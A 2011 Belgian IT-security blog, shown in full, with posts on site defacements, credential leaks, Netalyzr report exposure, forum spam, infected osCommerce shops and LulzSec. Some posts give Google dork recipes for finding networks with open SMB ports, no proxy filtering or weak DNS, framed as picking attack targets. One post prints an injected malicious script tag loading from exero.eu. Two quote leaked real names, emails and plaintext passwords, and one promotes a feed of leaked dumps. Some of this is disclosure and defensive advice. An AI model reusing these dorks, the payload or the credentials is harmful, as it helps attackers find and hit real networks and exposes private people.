08/05/2011

how to find the same defacement with google image search

this is an example

http://www.google.com

well we first searched for hacked or you type in the emailaddress or a typical name or whatever interesting and unique in the defacement

and if that ain't possible you just search for the domainname in google images for all the images on the website

than you click and drop the image in the searchbox and click on the camera and than you have the result

- but it isn't unique it is just a limited snapshot of what Google themselves found at a certain moment

Permalink | |  Print |  Facebook | | | | Pin it! |

netanalyzr it is not the intent but the content that is important

the same day as we have the publication of several reports about hidden tracking by marketing firms for big sites we find that a tool that is promoted by privacy activists to check up agains the limitations of our privacy on the networks of our Isp is leaking so much information online that it becomes a big security problem.

it is by chance that it was found and the cert.be has been contacted

but what the hack was going through their minds

the minds of the analyzers themselves who didn't thought one moment about the security of the information and the vulnerabilities that it could produce and who didn't start with the privacy of the users from the start and so produced the worst case of securitysoftware that if it were commercial would have been lamblasted all over the web

the minds of the security activists who didn't check things, even the most simple ones to be sure that if they were going to defend, promote or accept a privacycontrol software it was secure and private enough to handle all the information

good intentions aren't enough

Permalink | |  Print |  Facebook | | | | Pin it! |

netanalyzr for home computers, please give all your info to the world

this is the full process of the analyzes with all the connections and servers that are used

http://www.scribd.com/doc/61674312/netalyzr-icsi-berkeley...

so what with computers that are not behind a NAT and a supposed network security policy

what they lose of information through the publication of their test online

so we will now be looking at a telenet homecomputer of which the following information has been published online

http://netalyzr.icsi.berkeley.edu/transcript/id=3210a1cd-28085-1dbd181d-93d4-4a07-9b14/side=server

it is totally different from the network analyzes

in some you can see the version of the java runtime (exploit anyone)

than we need the identification of the pc (even if they use DHCP)

004,171 test-2| IP: 0:0:0:0:0:0:0:1 004,171 test-2| hostname: 0:0:0:0:0:0:0:1 004,172 test-2| IP: 127.0.0.1 004,172 test-2| hostname: 127.0.0.1 004,172 test-2| Display name: net0 004,172 test-2| Display name: net1 004,172 test-2| Display name: net2 004,172 test-2| Display name: ppp0 004,172 test-2| Display name: eth0 004,172 test-2| Display name: eth1 004,173 test-2| Display name: eth2 004,173 test-2| Display name: ppp1 004,173 test-2| Display name: net3 006,443 test-2| IP: fe80:0:0:0:593e:59bb:e402:a1ce%10 006,443 test-2| hostname: fe80:0:0:0:593e:59bb:e402:a1ce%10 006,444 test-2| IP: 192.168.0.233 006,444 test-2| hostname: 192.168.0.233 006,444 test-2| Display name: net4 006,445 test-2| IP: fe80:0:0:0:10f0:3777:3f57:ff78%11 006,445 test-2| hostname: Ben-PC 006,446 test-2| Display name: eth3 006,447 test-2| IP: fe80:0:0:0:6d0b:856b:fdea:f245%12 006,447 test-2| hostname: fe80:0:0:0:6d0b:856b:fdea:f245%12 006,448 test-2| IP: 192.168.0.135 006,448 test-2| hostname: 192.168.0.135 006,448 test-2| Display name: net5 006,786 test-2| IP: fe80:0:0:0:dd63:71f4:725d:7ae3%13 006,786 test-2| hostname: fe80:0:0:0:dd63:71f4:725d:7ae3%13 006,786 test-2| Display name: net6 006,786 test-2| Display name: net7 006,786 test-2| Display name: net8 007,130 test-2| IP: fe80:0:0:0:0:5efe:c0a8:87%16 007,130 test-2| hostname: fe80:0:0:0:0:5efe:c0a8:87%16 007,470 test-2| IP: fe80:0:0:0:0:5efe:c0a8:e9%16 007,470 test-2| hostname: fe80:0:0:0:0:5efe:c0a8:e9%16

we have everything

okay let's go on now to the browser

021,920  test-8| Line 4:Header: User-AgEnt: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
021,920  test-8| Line 5:<P>
021,920  test-8| Line 6:Header: AcCept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
021,920  test-8| Line 7:<P>
021,920  test-8| Line 8:Header: AccEpt-Language: nl,en-us;q=0.7,en;q=0.3
021,920  test-8| Line 9:<P>
021,921  test-8| Line 10:Header: AccEPt-Encoding: gzip, deflate
021,921  test-8| Line 11:<P>
021,921  test-8| Line 12:Header: AccEPT-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

what we got more
unrestricted DNs (never heared of Opendns telenet ?)
accepts malformed packages (filtering attacks anyone ?) probably also no good firewall on PC

I also need to know what kind of files arrive up to the computer without checking (they test with a torrent and a mp3 and
really a

025,483 test-15| Fetching file eicar-standard-av-test-file.com of length 68 025,483 test-15| query is GET http://n1.netalyzr.icsi.berkeley.edu/file/id=43ca253f-28949-dd40078d-dc0a-4a56-8281/name=eicar-standard-av-test-file.com HTTP/1.1 025,590 test-15| connected to n1.netalyzr.icsi.berkeley.edu:80 in 107 ms 025,998 test-15| HTTP headers received: Server Date ICSI-Client-Addr Content-Type Content-Length Set-CooKIE Last-Modified 025,998 test-15| Connection header is null 025,998 test-15| Content length is: 68 025,998 test-15| Got all content 025,998 test-15| Got response code 200, length is 68 025,998 test-15| Header 0 is Server 025,998 test-15| Header 1 is Date 025,998 test-15| Header 2 is ICSI-Client-Addr 025,998 test-15| Header 3 is Content-Type 025,998 test-15| Header 4 is Content-Length 025,998 test-15| Header 5 is Set-CooKIE 025,998 test-15| Header 6 is Last-Modified 025,998 test-15| Test file fetched successfully

a testfile for an antivirus and if the test file is fetched successfully this means that .... there is no good antivirus because the file
has been made to test for the presence of a good antivirus (which should have blocked it)

and than I need more information about the ports, but that I have for each port

so I know the browser, the IP address, the open ports, the installation of a good antivirus, the presence of security - installations by the provider
(none as far as it seems - I thought that they have said they have done so after the new law on telecommunication but maybe I have
been dreaming

this is good enough for most attackers I suppose



Permalink | |  Print |  Facebook | | | | Pin it! |

netanalyzr the best free securitytest tool for networkpeople and the worst dataleakage

What they should have done

* have a real full example file

* have a privacy policy

* do not publish  the data online but send it to mail or something like that

* do not publish all the data in the report - generalize it - or send the technical detailed report only to the people responsable for the network or host (after signing an agreement online etc....)

* contact Google to empty their cache

* destroy all online information from networks and computers

after having read all this (and more to come) it is incredible that privacy activists didn't have anything "privacy preserving" methods included in their report or website

when you go to http://netalyzr.icsi.berkeley.edu/ the online privacyblogs and activists say you can discover what is blocked or captured by the Isp or other networkinterference between you and the internet

and it is true when you see the report after that the java applet has been installed on your computer it is just amazing

networkpeople and securitypeople in networks would just love to have that information in one screen at hand

you will need to read a lot paper to understand it fully as a networkperson

but as a securityperson you will see immediately which are the rights of the machine through the firewall and what is the role the proxy and other security-installations (you will see how 'exposed' the computer is and which ports are open and if the local IP address is known or not)

this is a sample report http://netalyzr.icsi.berkeley.edu/restore/id=example-sess...

than we look at the FAQ  http://netalyzr.icsi.berkeley.edu/faq.html

there is no privacy policy  euh 

okay lets ask Google

Google Dork  site:netalyzr.icsi.berkeley.edu/  NAT detected

so these are computers that are behind a network of a company or institution and we have about 2300 full reports online

First their NAT address is discovered and published "Your global IP address is 75.173.65.226 while your local one is (none of your business). You are behind a NAT."

secondly you have all the ports that are open between the firewall and the specific client

so take that for example (based on the example report) that we want to attack port 139

site:netalyzr.icsi.berkeley.edu/  NAT detected "access to remote NetBIOS servers (port 139) is allowed"

yes, we have now about 773 networks that allow a direct communication between their posts and the port 139 and where the securitypeople didn't read anything about securing a network the last 10 years.

If they leave that port open you can assume that you can do a whole lot of other things

so lets go a bit furtherand use not only the port 139 but also the port 445 for a full attack

site:netalyzr.icsi.berkeley.edu/  NAT detected "access to remote NetBIOS servers (port 139) is allowed" AND "access to remote SMB servers (port 445) is allowed"

like we thought most of them allowed both

but you can extend the Google dork with any port that is in the example or service that you want to use that is being monitored. some networks won't give all the information so you may have to test it.

okay let's now also limit the country. This is not perfect but it can be done because it sometimes also gives the Isp address of the IP address and in that address you will sometimes find the country domainextension

the best way to do that is by using the name of the isp

dslextreme.com for example (4 networks )     dslextreme.com site:netalyzr.icsi.berkeley.edu/  NAT detected

You can also work with ipranges in which you will only use the first series

hey there is even more even more crazy stuff you can discover which is NOT in the example file (which is by the way not a real example file at all because the tests are much more comprehensive (and intrusive) as the more or less 'innocent' example file shows (and misleads in a way, sorry guys). Transparancy.

these are some of the ports that are checked and can be dorked

if you want to see if others are tested and found you just add "port xxx)" to the dork

Direct TCP access to remote OpenVPN servers (port 1194) is allowed.
Direct TCP connections to remote PPTP Control servers (port 1723) 
Direct TCP access to remote TOR servers (port 9001) is allowed.
for UDP there are also interesting dorks to make

The applet was able to send fragmented UDP traffic.

The applet was able to receive fragmented UDP traffic.

Direct UDP access to remote DNS servers (port 53) is allowed.
Direct UDP access to remote NTP servers (port 123) is allowed.
Direct UDP access to remote OpenVPN servers (port 1194) is allowed.
Direct UDP access to remote MSSQL servers (port 1434) is allowed.
so imagine what kind of dorks you can make with a combination of open tcp and open udp ports to infiltrate and inject and to extract
Even better on some networks you get a real internal traceroute - no joke
this is an example (there are 360 traceroutes of internal networks)
ip-10-114-184-3.ec2.internal (0 ms)
ip-10-1-50-41.ec2.internal (0 ms)
ip-10-1-34-78.ec2.internal (0 ms)
216.182.232.70 (0 ms)
*
*
*
*
dca-edge-18.inet.qwest.net (8 ms)
dcp-brdr-03.inet.qwest.net (6 ms)
xe-9-1-0.edge1.washington4.level3.net (4 ms)
ae-71-71.ebr1.Washington1.Level3.net (4 ms)
ae-91-91.ebr1.Washington1.Level3.net (4 ms)
ae-7-7.ebr3.Dallas1.Level3.net (36 ms)
ae-7-7.ebr3.Dallas1.Level3.net (35 ms)
ae-73-73.csw2.Dallas1.Level3.net (36 ms)
ae-3-80.edge3.Dallas1.Level3.net (36 ms)
WINDSTREAM.edge3.Dallas1.Level3.net (37 ms)
h8.254.213.151.static.ip.windstream.net (35 ms)
h8.254.213.151.static.ip.windstream.net (37 ms)
h6.254.213.151.static.ip.windstream.net (42 ms)
h71.254.213.151.static.ip.windstream.net (43 ms)
h87.17.213.151.static.ip.windstream.net (47 ms)
h115.16.213.151.static.ip.windstream.net (51 ms)
sedivy.com (58 ms)
you can in fact check all these things (but them behind "  "  in your googledork with AND if you want to see  ports open and a - if you don't want to treat with a proxy to block your online attackscripts

yes, you can filter all the networks that have no proxy to filter those webbased attacks

if these filters are not present you get these results (for about a 1000 networks here)

Address-based HTTP proxy detection : OK

 
Content-based HTTP proxy detection : OK
 
HTTP proxy detection via malformed requests : OK
 
Filetype-based filtering : OK
 
HTTP caching behavior : OK
 
JavaScript-based tests : OK
OK here means that there is NOTHING that you can pass even with malformed packages, that there is NOTHING in between, that the route is all clear to go attacker
and if you want to be sure of even less security add -OPENDNs (only 54 networks here use it so no great loss) and off course that have no DNssec ("It does not validate DNSSEC")
but you can also check for open or insecure dns servers
you can try this  "DNS resolver port randomization (?): Danger"  for DNs poisioning  there are 11 victims here
more to come
oh you thought this was all  (wait for this .....)
                            

Permalink | |  Print |  Facebook | | | | Pin it! |

08/04/2011

which .be site got most defaced the last years

infometeo.be and its other sites

again twice in the insecure .be sites today

and many times in the zone-h.org lists

running IIs 6

Permalink | |  Print |  Facebook | | | | Pin it! |

forum VT4 (television station) overwhelmed by spammers

Googledork    site:http://forumvt4.sbsbelgium.be 

official

Forum SBSBelgium - VT4 & VIJFtv - powered by vBulletin

forumvt4.sbsbelgium.be/ - Cached

Forum voor programma's op VT4 en VIJFtv, bedrijf SBSBelgium.

the last month 819 spampostings according to Google

Prednisone pills online- Cheap buy Prednisone in Salem - Forum ...
forumvt4.sbsbelgium.be › Forum VT4 › VT4 Website - Cached
1 post - 1 author - Last post: 5 days ago
Prednisone pills online- Cheap buy Prednisone in Salem VT4 Website.
Best price for Heart Shield in the internet - Forum SBSBelgium ...
forumvt4.sbsbelgium.be › Forum VIJFtv › Mooi en Meedogenloos - Cached
1 post - 1 author - Last post: 6 days ago
Cheapest Heart Shield online - Buy Without Prescription · Heart Shield · Heart Shield is a 100% natural supplement used to help treat heart diseases and to ...
Rave (Energy and Mind Stimulator) Die Apotheke für Deutschland ...
forumvt4.sbsbelgium.be › Forum VT4 › Lost - Cached
1 post - 1 author - Last post: 6 days ago
Rave (Energy and Mind Stimulator) Die Apotheke für Deutschland, die niedrigen Pr Lost.
fluoxetine without rx medications ,real buy fluoxetine no ...
forumvt4.sbsbelgium.be › ... › De Jeugd Van Tegenwoordig - Cached
1 post - 1 author - Last post: 6 days ago
fluoxetine without rx medications ,real buy fluoxetine no prescription online De Jeugd Van Tegenwoordig.
Buy Lasix Drugs | Best price for Lasix - Forum SBSBelgium - VT4 ...
forumvt4.sbsbelgium.be › Forum VT4 › De Smaakpolitie - Cached
1 post - 1 author - Last post: 6 days ago
Buy Lasix Drugs | Best price for Lasix De Smaakpolitie.

how to check

Google your own forum  site:nameforum.domainextension

if you have too many results you add Apotheke, prescription, "best price" "cheap buy"

You can also in your robot.txt ask Google and others not to index your forum so that it can't be used to insert links that will be used elsewhere as redirect

Permalink | |  Print |  Facebook | | | | Pin it! |

08/03/2011

what is the hacked site www.muziekcentrum.be

so they have lost their user accounts of at least 2 databases that are published on the web

this is a few hours ago

they are still online

they have no message on their site

more than a hundred accounts were published online (pasword, email,.....)

it is a site that is subsidized by the flemish administration to organize the musicians and the music-industry and has a database of who is who in the bizz and the scene

so if they don't take any measure I can say that someone plays punk music instead of jazz and change telephone numbers and if they use the same passwords for their emailmessages I can confirm the changes to the correspondents, saying I am going to live in Thailand for a while because I am sick of Belgian politics (and send it to the press so that it makes headlines)

get the picture

secure your website-database for any reason but the best reason is for your users

out of respect

Permalink | |  Print |  Facebook | | | | Pin it! |

Belgian .be oscommerce sites still infected

it is open source

for a real webshop

with open doors to inject redirect links to malware

and Google only indicates a few infected pages (it should maybe block the whole site instead of one page that it finds and another it overlooks (and indicates as safe)

  1. Fast Spirit<script src=http://exero.eu/catalog/jquery.js></script>

     - [ Translate this page ]
    fastspirit.be/oscommerce/catalog/index.php?cPath=489
    This site may harm your computer.
    Echappement V.W Oval 149,50€, Echappement V.W. double rond 149,50€, Scirocco ...
     
  2. CIS Computers<script src=http://exero.eu/catalog/jquery.js></script>

    www.ciscomputers.be/Shop/index.php?cPath=88_16_33 - Cached
    Accessoires (13). boitier multimedia (3). cables · Chargeurs pc portable (11). Composants de PC & de pc portabl (76). - alimentations (3) ...
  3. BKCP-Powerplus Webshop<script src=http://exero.eu/catalog/jquery ...

     - [ Translate this page ]
    www.bkcp-powerplus.be/bkcppowerplus/shop/catalog/index.php?... - Cached
    BKCP-Powerplus Webshop<script src=http://exero.eu/catalog/jquery.js></script>

adapt the searchterm to your wishes  "http://exero.eu/catalog/jquery.js" site:be

Permalink | |  Print |  Facebook | | | | Pin it! |

net-bashers attack 'silly belgians' admins ? more to come ?

Net-Bashers
 
»
Net-Bashers
 
»
Net-Bashers
 
»
Net-Bashers
 
»
Net-Bashers
 
»
Net-Bashers
 
»
Net-Bashers
 
»
this feed is followed by the twitter.com/mailforlen (I only follow real interesting hackersfeeds the hundreds of others are in the lists you can follow according to the subject)
no opinion - just informing

Permalink | |  Print |  Facebook | | | | Pin it! |

two belgian websites (still hacked)

http://antwerpdiamondcity.be/

http://www.namurois.be/blog/

 

muslim.pngit is a holy holiday

Permalink | |  Print |  Facebook | | | | Pin it! |

another belgian site hacked and leaked flandersmusic

Net-Bashers: flandersmusic - Pastebin.com

pastebin.com/tWs7CDCu

4 hours ago - marleen vermeir abc123 vermeir MARLEEN marleen.vermeir1@telenet.be. mdurie hcts%iu? ... PeterVB Section21 Van Bogaert Peter liquidprodukts@telenet.be ...

the pirateship Net-bashers is sailing the Belgian seas and is hijacking boats and looting all the accounts to be published for all to see

this help-ship has sent to the belgian CERT harbor all the technical info they need (and which is published here also) to follow this situation up to the minute

Maybe the Inspecting ship from our Privacy commisson should sail out for some inspection rounds .....

maybe the FCCU will have to send out ships to protect our fleet :)

the risk is high that more is to come

off to the sea again  :)

usns-uss-comfort-t-ah-20.jpg

Permalink | |  Print |  Facebook | | | | Pin it! |

is wordpress becoming the next joomla (plus vulnerability hype)

Joomla is the kind of software management in which anybody can write whatever add on or script and include it in whatever version of your central software without any quality and securitycontrol or maintenance

today another zeroday vulnerability attack has been found against one of the thousands of free scripts and modules that are floating around the web

here is some expert advise (and that counts for all the open software libraries)

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:

  1. Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check


http://blog.sucuri.net/2011/08/timthumb-php-security-vuln...

at the other side if you do the following google

allinurl:timthumb.php -not found

which means all the sites that actually use this tool in a way that you can find it eas but without all the sites that have put logical restrictions on the ability of the script to upload pictures than you will see that we are only left with a handful of sites

some vulnerability research is only hype

but that changes nothing at the general management remark nor at the list of things to do with any softwarepackage you use

Permalink | |  Print |  Facebook | | | | Pin it! |

ebay userdata leak : rumor or trade secret

https://twitter.com/#!/anonadamh

first he tweets the 28th of july

Googling and searching NYT gives no results however
Now he says- because no one is finding any info
He also says that it was through an open FTP server, it was 500Giga and that there was account information in it

Or it is true and Ebay is running enormous risks because they can be fined in Us courts for millions and their stock and online business will falter because any trust will be gone because the people concerned weren't informed.
Or it is a black-op by antisec or an agent-provocateur or should we call them cyberprovocateur trying to get antisec to spread false rumors (as with topiary using paypal)
I can't believe that ebay has that information on an open FTP server and that personal information wasn't encrypted or protected. But I hardly believed that sony could be hacked the way it was. But in the Us the laws and controls are stronger and the penalties bigger.
so I would say two things
* shut up or proof your case
* if you don't monitor the web.2 environment you don't know shit about your company or brand
 
 
 
 
 

Permalink | |  Print |  Facebook | | | | Pin it! |

ITsecurity activists also need some lulz on the high seas

Lulz wanted to make some fun in the Anonymous world of declarations and discussions and heated exchanges between different fractions

so he started lulzsec antisec just to show by some social engineering, hacking and penetration techniques that the security of even the biggest digital enterprises is sometimes just embarrasing

so why not the security people

well instead of reporting a securitybreach to the securitypeople of the CERT

I say now

I bring you the wounded and the dead boats to your harbor, captain

I have found them on the high wild seas of the Internet where storms are raging

They should be fixed before those boats can sail out again or they should buy a new boat

I am just a red cross ship going out to help and I do not participate in the battles on the high seas

 

and maybe I should also say

please keep those small defenseless boats from sailing on the high seas

I hate bringing them back in after a few weeks on the sea

and I am also tired of bringing each time the same boats back

(and you probably of having to see them sail out again they way they were brought in)

 

sounds more fun

and yes having a whiskey and a ball and a sing-a-long :)

and girlz or our wives and our kids playing around and a bbq or a banquet :)

before we go out on the high seas again - looking to help

Permalink | |  Print |  Facebook | | | | Pin it! |

leaked :Belgian jazz meeting (passwords and emails)

Net-Bashers: Belgian jazz meeting - Pastebin.com

pastebin.com/ZP2bZ7ph

9 minutes ago - vermeir marleen vermeir abc123 MARLEEN marleen.vermeir1@telenet.be ... bastiaensen riabastiaensen basti64 ria ria.bastiaensen@telenet.be ...

 

will Belgian and dutch sites understand now that they are not spared from the leak attacks on the internet now

that defacing a site is so old-school and that this newer bunch just wants to leak the most important information it finds, to embarrass you and that you will have to contact them and get your site off the net and get your things in order for once and for all

ps have you seen how short and stupid these passwords are

think about password rules for your accounts is no luxury

sql injection (what else) or weak admin password (take 12 characters)

if you are on the list

* I hope you don't use that password elsewhere

* you will receive more spam, undetected viruses and scams

there are more than  3 million emails and accounts breached the last months and at this rate ....

Permalink | |  Print |  Facebook | | | | Pin it! |

#topiary or lulzsec was not using paypal (online black ops)

the virtual world is a world of make believe and duping especially if you are on the borderline or totally in illegality

so you may not believe what you see, but have to go a bit further

except even journalists don't check the facts or the sources before they publish, retweet or say something

together with twitter and the other social network you can set up blackop operations quite easily, cheaply and effectively (even if it is discovered you will always have convinced enough people and left some doubt with the rest). The goal of a black op or psy op is just that. And you will never be able to rectify it with the same force and speed.

so there are tweets going around that lulzsec would have used paypal while there is a whole campaign against paypal going on (and up to 40.000 people at least (but it can be tenfold) ) have closed their accounts

and if you know you are the target of psy-ops than you have to be smarter than that

and in Anonymous there are some very smart guys and girls

"lulz: http://pastebin.com/EcNCwaEu

the whole conversation is staged. we knew that someone would leak it so we made everything up.
we tought that it would reach th3j35t3r and he would leak it.
proof is the plaintext of the “target-hash” ->  8bb4cdc8f511ad386e723f298c9b3c39 = ‘th3j35t3r got trolled’
boredom o/

–alex"

 

so this means that they have seen the fabricated IRC conversation (where an anti-lulzsec impersonated topiary and decided to leak it themselves but with a hidden tracker. so the 'anti lulzsec' operators on twitter read it, jumped on it without thinking and releaked it

it also means that you have to be very careful and have to check the MD5 of the personae in the IRC forums because you never know who the ghost is at the other side.

Permalink | |  Print |  Facebook | | | | Pin it! |

08/02/2011

#refref tool : things to already think about

#refref is the tool that Anonymous will launch half august (for those who pay) and half september for the rest of us

the securitypeople will hope that enough firms will pay to get the tool half august so they can release patches to defend their systems (databases) and release workarounds or identifiers for traffic-interceptors and cleaners

but there are also a few things one could think about - especially if you are a high value target or logical target

* resourceplanning : the attack brings down the machine in about 42 seconds after the attack on an unpatched and unprepared machine (like pastebin.com) this means that you need realtime monitoring of the resources of your machines and immediate automatic responses if those resources are spiraling into a hurricane (this could be to drop the connection or the process all together)

* trafficinterceptors and defenders : you need a box before your installation that will drop or analyze traffic to your network or servers that is capable of adding quickly ID's so you can stop this kind of traffic before it reaches the server(s).

* alternative sites : most of the sites today have databases and interactive functions but if you have a statistic website you could divert the traffic to that site if it has the characteristics of an attack. It could also be easier to stay 'online' if you are under attack and inform your contacts and customers about the technical situation and your time planning.It also means that you need a clean backup and eventually another alternative hoster (eventually more expensive but more secure) to take the hosting when you are actually under this kind of attack.

* logging : the tool itself doesn't protect the attacker who is solely responsable for his anonimity. This means that at one side you will need to keep the logging (and send it immediately to another resources outsiders can't reach) and at the other site you will need an immediate alerting system if some special kind of logs are seen. 

* sql injection : the goal is also to do an sql injection and to extract information. Checking your website against all kinds of sql injection is the best way to prepare yourself and to protect yourself against one of the most popular attacks.

* encryption : the lesser information you have online, the better because there is less to invest to keep it secure. But that is on the condition that you have protected it with rights (like Data Leakage pRevention) and by encryption (more than MD5)

* patching : the tool will include vulnerabilities and exploits so it means again that machines and Os and all the different codepackages have to be in their most recent version and be patched whenever needed. You will have to need a patching process in place because otherwise it will not be possible to insert all the patches that maybe launched in the coming weeks and months because of this tool.

more to come if more information is known

Permalink | |  Print |  Facebook | | | | Pin it! |

the arrest of Lulzsec-Topiary and questions

First the repraisals are already happening now it is clear that a major Lulzsec operator has been arrested. It is not clear yet how many will follow and what the impact will be, but it is clear that if you are linked in any way as an operator with this arrest you will have to keep it absolutely secret or close down as many internetactivities as possible for the time being.

secondly this doesn't mean the end of Lulzsec because Lulzsec is a certain idea of hacking which is a combination of the 4chan having fun doing incredible things and making people look absolutely stupid and giving some political or Itsecurity manifesto reason to it. Before Lulzsec Anonymous was becoming boring to the kids on the blockn thanx to Lulzsec they are cool again doing cool stuff.

thirdly about 750.000 authentic logins were found on the computers (he used more than 40 virtual instances on his machine) but there is no information available about the rest of the loot that was going to be published soon (1 GIga NATO, 8 giga european stuff Italian cyberpolice, sun 4 giga emails,....) and it is not clear yet if there are other copies of that stuff somewhere out there. It also means that Topiary has some room for settlement because nobody is interested in him - the only thing going through the minds of every securityperson is : how we get that stuff back in the can ? And if a deal is the fastest way, so be it. Those who want to show a lesson (with all the risks of new repraisals and leaks) will probably take a second row (or have to leave the room even) because there are a lot of national security interests involved.

fourth before rebelling kids were throwing stones, occupying buildings and wearing strange provocating clothes. Now they look like any other kid and hack military and police networks and leak the stuff. THis means that defacing is passee, leaking is cool if you want to make a name or an impact. Oh yes you can arrest 10, 100 or a 1000 but there will always be some kid somewhere who will find it cool to be in control and will be waging a cyberbattle with the forces 'above him' feeling liberated, exited and important (for once) and loving every second of it.

fifth you better adapt to this new environment (and you will probably have to double your investment in security for the time being but your ROI will be immediate)

and yes, there is always a big chance that you will be found when enough resources will be thrown exclusively at it because you are becoming too much of an embarrassment or danger.

and I agree, the biggest danger is not the hacker, but the lack of complete security because even if there is no active hacker now attacking your network, there will always be someone else for whatever reason who will abuse it.

Permalink | |  Print |  Facebook | | | | Pin it! |

twitterlist following wikileaks-anonymous-antisec updated with new sources

this twitterlist is unique to follow because you will find in the same twitterlist the different components of the movement

* wikileaks - the cables, assange etc

* antisec - Lulzsec (and now freetopiary) and the actions around this (70 websites from police agencies were taking down a few hours alone)

* the protest movements that inspire (social, political,....)

* the legal anonymous actions and papers

* the hackers around it doing their stuff

You will also find

* the antisec hackers and provocateurs

 

and this

* from countries around the world

* in different languages

 

so yes, it can seem confusing but I think it is one of the most complete lists around

and there is an hourly tweeted times with the best articles of that hour

there are also a lot of other lists to look at

you can follw me, but don't forget to follow or keep a watch one or many other lists

ps one has new proxies all the time, another has new books or freeware all the time, another exploits etc....

http://www.twitter.com/mailforlen

Permalink | |  Print |  Facebook | | | | Pin it! |

new feed for leaked files and dumpz of websites and accounts (already 300 links)

this is the feed

http://www.diigo.com/list/Mailforlen/leaks/rss.xml

It has the dumpz and accounts that are found in paste-sites or that are announced

these are links to the downloads not articles about the downloads

these are also not the diplomatic cables and the wikileaks stuff

it will be updated daily or weekly depending my time  family health

the links are not checked (I make them to be sure I don't go back to them)

more stuff to come this evening

Permalink | |  Print |  Facebook | | | | Pin it! |